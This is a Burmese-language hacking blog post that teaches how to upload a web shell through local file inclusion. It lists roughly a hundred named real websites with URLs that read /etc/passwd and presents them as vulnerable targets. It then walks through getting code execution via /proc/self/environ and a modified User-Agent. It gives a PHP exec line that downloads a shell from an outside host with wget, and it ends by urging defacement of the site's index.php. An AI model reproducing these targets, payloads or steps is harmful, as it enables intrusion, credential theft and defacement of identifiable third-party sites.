Shell Upload using LFI method


Local File Inclusion Vulnerability ကို အသံုးခ်ျပီး Shell upload လုပ္ဖို ့အတြက္ common parameter အခ်ိဳ ့ကို သိထားဖို ့လိုအပ္ပါတယ္။

index.php?homepage=
index.php?page=
index.php?index2=

LFI နဲ ့ Shell upload လုပ္ဖို ့အတြက္ လိုအပ္တာေတြကေတာ့

၁။ Vulnerable Website
၂။ Shell
၃။ User-Agent Switcher ( Download )
၄။ Mozilla FireFox


ကြ်န္ေတာ့္ဆီမွာ ရွိေနတဲ vulnerable site ေတြကေတာ့

http://kyengerarotaryclub.org/index.php?page=/etc/passwd
http://www.crsfsite.net/main/index.php?page=/etc/passwd
http://modelspromo.com/index.php?page=/etc/passwd
http://www.mrt.ac.lk/gavel/index.php?page=/etc/passwd
http://nyctradeprinting.com/index.php?page=/etc/passwd
http://www.dayborodistrict.com.au/index.php?page=/etc/passwd
http://schumpeter2011.econ.tuwien.ac.at/index.php?page=/etc/passwd
http://www.alinholding.com/index.php?page=/etc/passwd&page_title=home
http://diuf.unifr.ch/pai/education/2006_2007/ca/index.php?page=/etc/passwd&subpage=/etc/passwd
http://lyantndc.cluster010.ovh.net/index.php?page=/etc/passwd
http://mspierphoto.com/index.php?page=/etc/passwd
http://www.tottenfarms.com/index.php?site=1&page=/etc/passwd
http://www.sohnidharti.tv/main/Urdu/index.php?page=/etc/passwd
http://www.crsfsite.net/main/index.php?page=/etc/passwd
http://www.expo-ingenieurs.be/index.php?lang=FR&page=/etc/passwd
http://www.lovium.nl/index.php?page=/etc/passwd
http://www.death-star.net/index.php?Page=/etc/passwd
http://www.f-a-t.de/fat_v1/index.php?lang_id=2&page=/etc/passwd
http://www.jpistudios.com/redirect.php?page=../../../../../../etc/passwd
http://x17agency.com/redirect.php?page=../../../../../etc/passwd
http://www.winnerspizza.com/index.php?page=/etc/passwd
http://oregon-airsoft.com/index.php?page=/etc/passwd
http://www.eyesonmain.ca/index.php?page=/etc/passwd
http://www.tottenfarms.com/index.php?page=/etc/passwd
http://www.rtscom.com/index.php?page=/etc/passwd
http://www.lavieillefrance.fr/index.php?page=/etc/passwd
http://www.evoca.ch/index.php?page=../etc/passwd
http://estaminetlille.fr/vieille/index.php?page=/etc/passwd
http://www.traildumont.be/index.php?page=/etc/passwd&album=12
http://www.speakingfromtheheartinc.com/index.php?page=/etc/passwd
http://www.moto-plus.net/index.php?Page=../../../../../etc/passwd
http://www.maxparts.ru/index.php?page=/etc/passwd
http://www.focusfloors.co.za/?page=../../../../etc/passwd
http://www.bushboats.co.za/index.php?page=../../../../etc/passwd
http://www.creteform.com/index.php?page=/etc/passwd&PHPSESSID=null
http://www.dreisingerfuneralhome.com/index.php?page=../../../../../etc/passwd
http://www.iceclub.biz/index.php?page=../../../../etc/passwd
http://www.daybororuralfire.com.au/index.php?page=/etc/passwd
http://www.spcstamps.com/index.php?page=/etc/passwd&back=null
http://www.ninaal.pl/index.php?page=../etc/passwd
http://www.tempelwelt.de/index.php?page=../../../../etc/passwd&PHPSESSID=null
http://www.mescreations.fr/index.php?page=../../../../etc/passwd
http://www.death-star.net/index.php?Page=/etc/passwd&Mode=MDP
http://www.scoberbernbach.de/index.php?page=/etc/passwd
http://lomejordehuelva.com/index.php?page=/etc/passwd
http://pomestam24.ru/index.php?page=/etc/passwd&option=login
http://www.kaltimmethanol.com/indo/index.php?page=/etc/passwd
http://winnerspizza.com/index.php?page=/etc/passwd
http://timslist.com/utechtube/index.php?page=/etc/passwd
http://www.fuw.edu.pl/~trawinski/index.php?page=/etc/passwd
http://www.memorial-odlozil.cz/odlozil/index.php?page=/etc/passwd
http://maxponomarenko.ru/index.php?page=/etc/passwd
http://shotgun.cc/index.php?page=/etc/passwd
http://www.fair-wohnen.de/index.php?page=../../../../../../etc/passwd
http://jhcs.eu/index.php?folder=Kontakt&page=../../../../../etc/passwd
http://www.rheuma-liga.selbsthilfe-wue.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.hamann-lege.de/index.php?page=/etc/passwd
http://www.ulmer-verein.de/uv/index.php?page=/etc/passwd
http://proimmo360.com/index.php?page=/etc/passwd
http://www.lelo.biz/index.php?name=Kontakt&page=/etc/passwd&items=4
http://www.misbrugscenterherning.dk/index.php?page=../../../../../etc/passwd
http://www.wti-juelich.de/index.php?page=/etc/passwd
http://www.sekoro.seko-bayern.org/index.php?page=/etc/passwd
http://www.immobilieninvest.at/index.php?page=/etc/passwd&PHPSESSID=null
http://www.lc-bensberg-schloss.de/index.php?page=../../../../../../../../etc/passwd
http://www.ingolstadt.muetterzentren-bayern.de/index.php?page=/etc/passwd
http://www.tendokarate.no/index.php?page=/etc/passwd
http://www.mstechnical.pl/de/index.php?page=/etc/passwd
http://www.k-turm.de/index.php?page=/etc/passwd
http://wsc-skiextreme.wir-und-ich.de/index.php?page=../../../etc/passwd
http://www.seniorenbueros-bayern.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.bodyworld-schkeuditz.de/index.php?page=/etc/passwd
http://www.fortschrittwuerzburg.selbsthilfe-wue.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.spielmannszug-ffw-oberkotzau.de/index.php?page=/etc/passwd
http://proimmo360.com/index.php?page=/etc/passwd
http://www.grabowscy.com/index.php?page=/etc/passwd
http://www.heilpraxis-geissdoerfer.de/index.php?page=/etc/passwd
http://www.selfclean.de/index.php?page=/etc/passwd
http://www.ninaal.pl/index.php?page=../etc/passwd
http://www.cncmodel.pl/eng/index.php?page=/etc/passwd
http://walk-in-the-park.de/index.php?page=/etc/passwd
http://www.k-tower.eu/index.php?page=/etc/passwd
http://dorfschuetzen.de.dedi926.your-server.de/index.php?page=/etc/passwd&PHPSESSID=null
http://www.ma2da.de/index.php?page=/etc/passwd
http://www.frauentreff-welden.de/index.php?page=/etc/passwd
http://etechnik-wichmann.de/index.php?page=../../../../etc/passwd
http://www.erotik-als-lebenskraft.de/index.php?page=/etc/passwd
http://84388.webhosting28.1blu.de/huchbaumanagement/index.php?page=/etc/passwd
http://www.stotterer-selbsthilfe-regensburg.seko-bayern.org/index.php?page=/etc/passwd
http://www.muezeger.de/index.php?page=/etc/passwd
http://schlafapnoe.selbsthilfe-wue.de/index.php?page=/etc/passwd
http://www.hctjstbk.cz/index.php?page=/etc/passwd
http://violetta-tradgard.se/index.php?page=/etc/passwd
http://www.sdhpardubice.cz/index.php?page=/etc/passwd
http://www.osteoporose.selbsthilfe-wue.de/index.php?page=/etc/passwd
http://www.die-drid.de/index.php?mod=kontaktmenu.php&page=/etc/passwd

ပထမဆံုးအေနနဲ ့LFI Vulnerable ရွိေနတဲ့ site ( အေပၚက List ထဲပါတဲ့ site ေတြတင္မကပါဘူး မိမိ ကိုယ္တိုင္ရွာေတြ ့ထားတဲ ့ site ေတြလည္း အသံုးျပဳလို ့ရပါတယ္ root access ရထားဖို ့ေတာ့လိုအပ္ပါတယ္ )
ရဲ ့ေနာက္မွာ /etc/passwd ဆိုတာကို ရိုက္ထည့္လိုက္ပါ။
ဒါဆိုရင္ေတာ့ root access ရေအာင္ လုပ္ဖို ့အတြက္ username & password ကို ေတာ့ရျပီ
Password ကို ဘယ္လို hash ျဖည္ရမယ္ root access ရေအာင္ ဘယ္လုိ လုပ္ရမလဲဆိုတာေတာ့ ကြ်န္ေတာ္ tutorial သပ္သပ္ ေရးခဲ့ျပီးျပီ လိုအပ္ရင္ ရွာဖတ္လိုက္ပါ။


 ေနာက္တဆင့္အေနနဲ ့ path ကို /proc/self/environ ဆိုတာကို ေျပာင္းလိုက္ပါ။ ကြ်န္ေတာ္ ဥပမာေပးထားတဲ့ site အရဆို ေအာက္ကပံုအတိုင္းျဖစ္လိမ့္မယ္။

အဲ့လို အထက္ကအတုိင္း /etc/passwd နဲ ့ /proc/self/environ ကို စစ္ၾကည့္လို ့ok တယ္ဆုိရင္ေတာ့
remote code execution လုပ္ဖို ့အတြက္  User-Agent Switcher ဆိုတဲ့ extension ကို အသံုးျပဳရပါမယ္။


User Agent ကို edit လုပ္ဖုိ ့နဲ ့ code ေတြ ေျပာင္းဖို ့အတြက္
ေအာက္မွာေဖာ္ျပထားတဲ ့ပံုေတြထဲကအတိုင္း step by step ျပဳလုပ္ေပးရမွာျဖစ္ပါတယ္။










အားလံုးျပီးသြားရင္ေတာ့ website ကို refresh လုပ္ျပီးေတာ့ Ctrl+F ကို ႏွိပ္ျပီး
"disable_functions" ဆိုတာကို search လုပ္ပါ။

disable_functions | no value | no value

 ဒါဆိုရင္ေတာ့ Shell တင္ဖို ့ ready ျဖစ္ေနပါျပီ





ေအာက္က command ကို သံုးျပီး shell upload လုပ္လို ့ရပါတယ္။


<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>


upload လုပ္ျပီး .php ဆိုျပီး နာမည္တစ္ခုနဲ ့ rename ျပန္လုပ္ဖို ့လိုပါတယ္။

 shell ကို upload လုပ္ျပီးသြားရင္ေတာ့ ေအာက္က ပံုအတိုင္း ျမင္ေတြ ့ရမွာျဖစ္ပါတယ္။


ဒါဆိုရင္ေတာ့ သင့္လက္ထဲ အဲ့ ဒီ site ေရာက္သြားပါျပီ။
index.php ကို ျပင္ျပီးေတာ့ သင့္ deface code ကို ထည့္ဖို ့အဆင္သင့္ပါပဲ။

(မွတ္ခ်က္။ ။ ကြ်န္ေတာ္သည္ black hat တစ္ေယာက္မဟုတ္သလို white hat တစ္ေယာက္လည္း မဟုတ္ပါဘူး အရွင္းဆံုးေျပာရရင္ "I am not Hacker, but i love Hacking".)



3 comments to "Shell Upload using LFI method"

Post a Comment

သင့္ရဲ ့ comment မ်ားက ကြ်န္ေတာ္တို႔လို blogger ေတြ အတြက္ အားေဆးတစ္ခြက္ပါ။
ေကာင္းသည္၊ ဆုိးသည္ ေရးႏုိင္ပါသည္။ လိုအပ္သည္မ်ားကိုလည္းေဝဖန္အၾကံေပးႏုိင္ပါသည္။

Powered by Blogger.

About This Blog

Blogger Tips And Tricks|Latest Tips For Bloggers Free Backlinks

Respect List

Blink Hacker Group

Myanmar Hacker Uniteam

Brotherhood of Myanmar Hackers

and All Myanmar Attackers & All Myanmar Black Hats.

Popular Posts

Followers

Web hosting for webmasters